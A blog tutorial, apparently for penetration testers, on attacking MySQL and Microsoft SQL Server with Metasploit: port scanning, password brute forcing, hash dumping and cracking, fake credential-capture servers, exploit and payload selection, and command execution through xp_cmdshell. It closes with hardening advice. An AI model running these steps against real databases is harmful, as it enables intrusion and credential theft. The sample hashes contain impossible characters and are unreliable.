How To Use SqlPloit

How to use Sqlploit


 monitor-68156_640


Databases nowdays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information are stored in database servers that are often poorly secured.


Someone an to this information could have control over a company’s or an organization’s infrastructure. He could even sell this information to a company’s competitors. Imagine the damage that something like this could cause. In this article, we will see how we can use Metasploit to attack our database servers.


Metasploit is a very powerful tool. Actually, is not just a tool, it is a collection of tools. It is a whole framework. It has gained incredible popularity in the last few years because of its success in the fields of penetration testing and information security. It includes various tools, from various scanners to exploits. It can be used to discover software vulnerabilities and exploit them. With database servers having so many security weaknesses, Metasploit has numerous auxiliary modules and exploits to assist you with your database server penetration testing. Metasploit is available for all popular operating systems so what operating system you are already using might not be a problem. In this article we are going to use Metasploit’s auxiliary modules and exploits to complete various penetration testing tasks against popular database servers, such as Microsoft SQL Server and MySQL. I hope you enjoy it!


Attacking a MySQL Database Server


MySQL is the world’s most used open source relational database management system. Its source code is available under the terms of the GNU General Public License and other proprietary license agreements. MySQL is the first database choice when it comes to open source applications creation. MySQL is a very secure database system, but as with any software that is publicly accessible, you can’t take anything for granted.


sql1


Figure 1. Discovering MySQL servers – The nmap wa

Discover open MySQL ports


MySQL is running by default on port 3306. To discover MySQL you can do it either with nmap or with Metasploit’s auxiliary modules.


The NMAP way


Nmap is a free and open source network discovery and security auditing utility. It can discover open ports, running services, operating system version and much more. To discover open MySQL ports we use it in this way:


nmap -sT -sV -Pn -p 3306 192.168.200.133


Parameters:


-sT: TCP connect scan


-sV: Determine Service version information


-Pn: Ignore Host discovery


-p 3306: Scan port 3306


Scanning the whole network:


nmap -sT -sV -Pn -–open -p 3306 192.168.200.0/24


Parameters:


–open: Show only open ports (Figure 2)


sql2


Figure 2. Discovering MySQL servers – The nmap way

 

The Metasploit way


Metasploit offers auxiliary module mysql_version. This module enumerates the version of running MySQL servers. To use it type:


use auxiliary/scanner/mysql/mysql_version


To use this scanner you have to set its options. Type:


show options


To see a list of available options (Figure 3).


sql3


Figure 3. mysql_version auxiliary module options


Set the RHOSTS parameter:


set RHOSTS 192.168.200.133


or


set RHOSTS 192.168.200.0/24


Set the RPORT parameter to a different value if you believe that the MySQL Server is listening on a different port:


Set RPORT 3333


Increase THREADS value for a faster scanning (Figure 4):


sql4


Figure 4. mysql_version options after setting them up

 

set THREADS 50


Now, all you have to type is:


run


and hit enter (Figure 5).


sql5


Figure 5. mysql_version scanner in action

As you can see from the screenshot we have a MySQL version 5.0.51a running at 192.168.200.133!


Brute forcing MySQL


There is an auxiliary module in Metasploit called mysql_login which will happily query a mysql server for specific usernames and passwords. The options for this module are: Figure 6.


 sql6


Figure 6. mysql_login module options


To start your attack you have to set the RHOSTS option and choose a username and a password.


SET RHOSTS 192.168.200.133


SET USERNAME root


Leave the password blank. Your options, after executing the commands above, should seem like Figure 6. mysql_login will try to login with blank password and with the username as the password. Maybe we are lucky before we start brute-forcing database with passwords lists (Figure 7).


sql7


Figure 7. Starting brute-forcing database with passwords lists

We were lucky! The administrator is completely ignorant. But what if we weren’t so lucky? We then need a password list file. We can create one by ourselves or download one from the Internet. Let’s create one!


Creating a password list


To create our password list we are going to use crunch. If you are using BackTrack, crunch is already installed. Open Privilege Escalation > Password Attacks > Offline Attacks > crunch. Otherwise download it from here http://sourceforge.net/projects/crunch-wordlist/.


Execute:


./crunch 6 8 abcde123456 -o passfile.lst


The above command will create passwords between 6 and 8 characters long, consisting of ascii characters a,b,c,d,e and numbers 1,2,3,4,5,6 and will save the list into file passfile.lst (Figure 8).


 sql8


Figure 8. Generating a password list with crunch

Using password lists


Now that we have our password list stored in /pentest/passwords/crunch/passfile.lst, we can use it in mysql_login module.


Set PASS_FILE /pentest/passwords/crunch/passfile.lst


Increase also the number of concurrent threads for a faster brute-force attack.


SET THREADS 50


run


mysql_login (Figure 9) module offers 2 other options, USER_FILE and USERPASS_FILE. You can use a username file list to try various username values by setting the USER_FILE option accordingly. With USERPASS_FILE parameter you can use a file which contains both usernames and passwords in the same file separated by space and one pair per line.


sql9


Figure 9. mysql brute-force attack using password list

Bypass MySQL Authentication


Module mysql_authbypass_hashdump exploits a password bypass vulnerability in MySQL and can extract usernames and encrypted passwords hashes from a MySQL server. To select it type:


use auxiliary/scanner/mysql/mysql_hashdump


Set RHOSTS and THREADS option:


set RHOSTS 192.168.200.133


set THREADS 50


and run the module. We can also set parameter username.


set username root


Unlucky! (Figure 10)


sql10


Figure 10. Running mysql_authbypass_hashdump module


Dump MySQL Password Hashes


mysql_hashdump extracts the usernames and encrypted password hashes from a MySQL server. One can then use jtr_mysql_fast module to crack them. The module is located in auxiliary/scanner/mysql. To use it set RHOSTS option to our target’s IP address and increase THREADS value. If you have managed to reveal root password then set also options USERNAME and PASSWORD. Run the module to get your precious results! (Figure 11)


sql11


Figure 11. mysql server hashes and usernames

Cracking passwords with John The Ripper


Metasploit offers module jtr_mysql_fast.This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. John the Ripper is a free and Open Source software password cracker, available for many operating systems such as Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. After having acquired mysql hashes with mysql_hashdump module, load jtr_mysql_fast module and run it.


use auxiliary/analyze/jtr_mysql_fast


run


This module offers options such as setting a custom path for john the ripper. The option that interests you the most is the Wordlist option, which is a path to your desired password list (Figure 12).


sql12


Figure 12. jtr_mysql_fast module options


Getting the schema


A database schema describes in a formal language the structure of the database, the organization of the data, how the tables, their fields and their relationships between them must be defined and more. In general, database schema defines the way the database should be constructed. Metasploit has the module mysql_schemadump to get MySQL schema. mysql_schemadump is located under auxiliary/scanner/mysql. To use it you have to set RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one hosts increase THREADS value!


Let’s go Phishing


Phishing is an attempt to steal sensitive information by impersonating a well known organization. In the same manner you can trick a user to steal her MySQL credentials. One of the abilities of Metasploit is this, mimic known services and capture user credentials. Among the various capture modules there is a module called mysql. This module provides a fake MySQL service that is designed to capture MySQL server authentication credentials. It captures challenge and response pairs that can be supplied to Cain or John the Ripper for cracking.


To select the capture module type:


use auxiliary/server/capture/mysql


This module offers some interesting options. You can set CAINPWFILE option to store captured hashes in Cain&Abel format or JOHNPWFILE to store hashes in John The Ripper format. Leave SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can also set the SRVVERSION option, which is the version of the mysql server that will be reported to clients in the greeting response. This option must agree with the true mysql server version on the network if you don’t want to being detected. You can also configure the module to use SSL! (Figure 13)


sql13


Figure 13. mysql capture module options

Run the module and connect to the capture mysql server from another computer on the network to see how it is working. To connect to a mysql server open a terminal and type:


mysql -h ip_address -u root -p


Enter any password, for now, in mysql’s prompt and see what is happening in Metasploit! (Figure 14)


sql14


Figure 14. mysql capture module in action


Metasploit has captured the hash and now this hash is stored in cain and john format in files /tmp/john and /tmp/cain. These are the files that I have chosen.


Cain Format


root NULL


94e243cab3181cvef73852s3011651369196a928


112263447569708899agbbfcddneff2113434455 SHA1


John format


root:$mysqlna$1112263447569708899agbb


fcddneff2113434455 *


94e243cab3181cvef73852s3011651369196a928


MySQL Exploiting


MySQL database system is a very secure piece of software. Metasploit doesn’t offer many MySQL exploits. Although some exploits exist.


YaSSL Exploits


YaSSL is a lightweight embedded SSL library. Metasploit offers 2 exploits for this library. The mysql_yassl_getname and the mysql_yassl_hello. The mysql_yassl_getname exploits a stack buffer overflow in the yaSSL 1.9.8 and earlier and mysql_yassl_hello exploits a stack buffer overflow in the yaSSL 1.7.5 and earlier. To use any exploit you have to select it:


use exploit/linux/mysql/mysql_yassl_getname


use exploit/linux/mysql/mysql_yassl_hello


use exploit/windows/mysql/mysql_yassl_hello


As you can figure, the last exploit is for windows systems. After selecting your desired exploit, you have to select the payload. Each exploit offers a variety of payloads. You have to choose the most suitable for your target. To see a list of available payloads for the exploit type (Figure 15):


show payloads


sql15


Figure 15. Exploit’s and payload’s options

The most successful exploits usually are the reverse_tcp payloads where the target machine connects back to you. Each payload offers some options. By typing


show options


you will see exploit’s and payload’s options (Figure 16).


sql16


Figure 16. mysql_yassl_hello exploit payloads

 

Other MySQL Exploits


We should mention here two more exploits that are available for MySQL systems that run on Windows servers. The mysql_payload and the scrutinizer_upload_exec. The first exploit, mysql_payload, creates and enables a custom UDF on the target. On default Microsoft Windows installations of MySQL 5.5.9 and earlier, directory write permissions are not enforced, and the MySQL service runs as LocalSystem. This module will leave a payload executable on the target system and the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions. The scrutinizer_upload_exec module exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer, a network traffic monitoring and analysis tool. By default, the software installs a default password in MySQL, and binds the service to “0.0.0.0”. This allows any remote user to login to MySQL, and then gain arbitrary remote code execution under the context of ‘SYSTEM’.


We are in!


And now what? Metasploit offers two modules that will assist you to enumerate a MySQL service or execute sql queries. All you need is a valid user-password pair. mysql_enum allows for simple enumeration of MySQL Database Server and mysql_sql allows for simple SQL statements to be executed against a MySQL instance. To select them, type:


use auxiliary/admin/mysql/mysql_enum


and execute the command


show options


to get a list of available options (Figure 17).


sql17


Figure 17. mysql_enum module option


To use mysql_sql execute (Figure 18):


sql18


Figure 18. mysql_sql module options

use auxiliary/admin/mysql/mysql_sql


and


show options


Attacking a Microsoft SQL Server


Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) used to store, retrieve and manage information. As with many Microsoft’s products, SQL Server has many security weaknesses. Let’s start by identifying running SQL servers on the network.


Discover open MSSQL ports


MSSQL is running by default on port 1433. To discover SQL Server you can use either nmap or Metasploit’s auxiliary module.


The NMAP way


To discover open MSSQL ports we execute the following command:


nmap -sT -sV -Pn -p 1433 192.168.200.133


Usually administrators, when they need more than one instances of SQL server they run the second instance at port 1434.


nmap -sT -sV -Pn -p 1433,1434 192.168.200.133


Parameters:


-sT: TCP connect scan


-sV: Determine Service version information


-Pn: Ignore Host discovery


-p 1433,1434: Scan port 1433 and 1434


Scanning the whole network


nmap -sT -sV -Pn -–open -p 1433,1434 192.168.200.0/24


Parameters:


–open: Show only open ports


The Metasploit way


Metasploit offers auxiliary module mssql_ping. This module discovers running MSSQL services. To use it, type:


use auxiliary/scanner/mssql/mssql_ping


Type:


show options


for a list of available options (Figure 19).


sql19


Figure 19. mssql_ping module options


To discover all running MSSQL services on the net, set RHOSTS value equal to 192.168.200.0/24, assuming that your target network is in this range, increase threads value for a faster scanning and run the module (Figure 20).


sql20


Figure 20. mssql_ping module in action


Brute forcing MSSQL


Auxiliary module mssql_login is working in the same manner as mysql_login does. It will query the MSSQL instance for a specific username and password pair. The options for this module are: Figure 21.


sql21


Figure 21. mssql_login options

The default administrator’s username for SQL server is sa. In the options of this module, you can specify a specific password, or a password list, a username list or a username-password list where usernames and passwords are separated by space and each pair is in a new line. Having set your options simply run the module and wait for your results! You can create your own password list file, like we did in the first chapter where we used mysql_login module.


Dump MSSQL Password Hashes


mssql_hashdump extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking with jtr_mssql_fast. This module also saves information about the server version and table names, which can be used to seed the wordlist. The module is located in auxiliary/scanner/mssql. To use it set RHOSTS option to our target’s ip address and increase THREADS value to 50. If you have managed to reveal root password then set also options USERNAME and PASSWORD. Run the module! (Figure 22).


sql22


Figure 22. mssql_hashdump module

Cracking mssql passwords with John The Ripper


Metasploit offers module jtr_mssql_fast. This module works in the same manner as jtr_mysql_fast does. It uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. After having acquire mssql encrypted hashes with mssql_hashdump module, load jtr_mssql_fast and run it.


use auxiliary/analyze/jtr_mssql_fast


and


run


You should set the Wordlist option which is the path to your desired password list (Figure 23).


 sql23


Figure 23. jtr_mssql_fast module options

Getting Microsoft SQL Server schema


Metasploit offers the module mssql_schemadump to retrieve MSSQL schema. mssql_schemadump is located under auxiliary/scanner/mssql. This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master,model,msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.To use it you have to set RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one hosts increase the THREADS value to get results faster.


Phishing with MSSQL


Metasploit has also a mssql capture module, called mssql. This module provides a fake MSSQL service that is designed to capture MSSQL server authentication credentials. The module supports both the weak encoded database logins as well as Windows login (NTLM). To select the capture module type:


use auxiliary/server/capture/mssql


You can set CAINPWFILE option to store captured hashes in Cain&Abel format or JOHNPWFILE to store hashes in John The Ripper format. Leave SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can configure the module to use SSL (Figure 24).


sql24


Figure 24. mssql capture module options

Run the module and connect to the capture mssql server from another computer on the network to see how it is working. To connect to a mssql server open your Microsoft SQL Server management studio and try to login to the running service (Figure 25). Metasploit has captured the username and the password the user entered to login to the fake MSSQL service.


 sql25


Figure 25. Login attempt captured by mssql capture module

Exploiting the Microsoft world


Metasploit offers some MSSQL exploits. Let’s take a look.


SQL Server 2000


SQL server 2000 is a very old version of Microsoft SQL Server and is hard to find it on Production environments nowdays. ms02_039_slammer exploits a resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0×04 and is followed by long string terminating with a colon and a number. To select it for use simply type:


use exploit/windows/mssql/ms02_039_slammer


Another exploit module for SQL Server 2000 is ms02_056_hello. ms02_056_hello is an exploit which will send malformed data to TCP port 1433 to overflow a buffer and possibly execute code on the server with SYSTEM level privileges. To select it, type:


use exploit/windows/mssql/ms02_056_hello


SQL Server 2000 – SQL Server 2005


ms09_004_sp_replwritetovarbin and ms09_004_sp_replwritetovarbin_sqli exploit a heap-based buffer overflow that occur when calling the undocumented “sp_replwritetovarbin” extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005. To use these exploits you type:


use exploit/windows/mssql/ms09_004_sp_replwritetovarbin


or


use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli


As with any Metasploit module, you can type


show options


to get a list of available options (Figure 26).


sql26


Figure 26. ms09_004_sp_replwritetovarbin_sqli module options

Type


show payloads


to get a list of available of payloads for the selected exploit.


SQL Server database systems


Metasploit offers the module, exploit/windows/mssql/mssql_payload, which executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure. Three delivery methods are supported. The original method uses Windows ‘debug.com’. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses ‘wcsript.exe’ to generate the executable on the target. Finally, ReL1K’s latest method utilizes PowerShell to transmit and recreate the payload on the target.


Another interesting exploit module that can be applied in all SQL Server versions is the exploit/windows/mssql/mssql_payload_sqli. This module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens. You should use a “reverse” payload on port 80 or to any other outbound port allowed on the firewall.


From inside


Metasploit offers various modules that will assist you to enumerate a MSSQL service, execute sql queries, retrieve useful data and many more. All you need is a valid user-password pair. mssql_enum will perform a series of configuration audits and security checks against a Microsoft SQL Server database. mssql_sql and mssql_sql_file will allow for simple SQL statements to be executed against a MSSQL/MSDE or multiple SQL queries contained within a specified file. To select them, type:


use auxiliary/admin/mssql/mssql_enum


or


use auxiliary/admin/mssql/mssql_sql


or


use auxiliary/admin/mssql/mssql_sql_file


and execute the following command to see the options (Figure 27)


show options


sql27


Figure 27. mssql_sql_file module options

Sample Data


There is an amazing module called mssql_findandsampledata. This module will search through all of the non-default databases on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS option. If column names are found that match the defined keywords and data is present in the associated tables, the module will select a sample of the records from each of the affected tables. You have to set the the sample size by configuring the SAMPLE_SIZE option. Your results will be stored in CSV format. Type


use auxiliary/admin/mssql/mssql_findandsampledata


and


show options


Executing Windows Commands


If you have managed to find a valid username – password pair, the most desired thing that you would like to do is to execute a command on the compromised machine. Metasploit offers module auxiliary/admin/mssql/mssql_exec which will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. All you need is the username and password!!


sql28


Figure 28. mssql_findandsampledata module options

Data mining


If you need to search for specific information in SQL Server databases there is a module that can make your life easier. Its name, mssql_idf, and you will find it under auxiliary/admin/mssql/. This module will search the specified MSSQL server for ‘interesting’ columns and data. The module is working against SQL Server 2005 and SQL Server 2008 (Figure 29).


 sql29


Figure 29. mssql_idf module options

Conclusion


Databases are the most important part of today’s computing systems. They usually contain all the information needed to run a company or organization. Therefore it is necessary to be as safe as possible. Metasploit framework is just one tool of many out there, that offers the appropriate scripts to compromise a database system. Databases are software that must be accessed by applications running on the Internet, that’s why they must be guarded by firewalls, use encryption and powerfull passwords and the whole system (database and operating system) must be checked every day for new updates and upgrades. The best choice would be to allow access to your database only from your intranet and/or vpn. Try not to expose your database directly to the web. Close all your database system ports now

No comments:

Post a Comment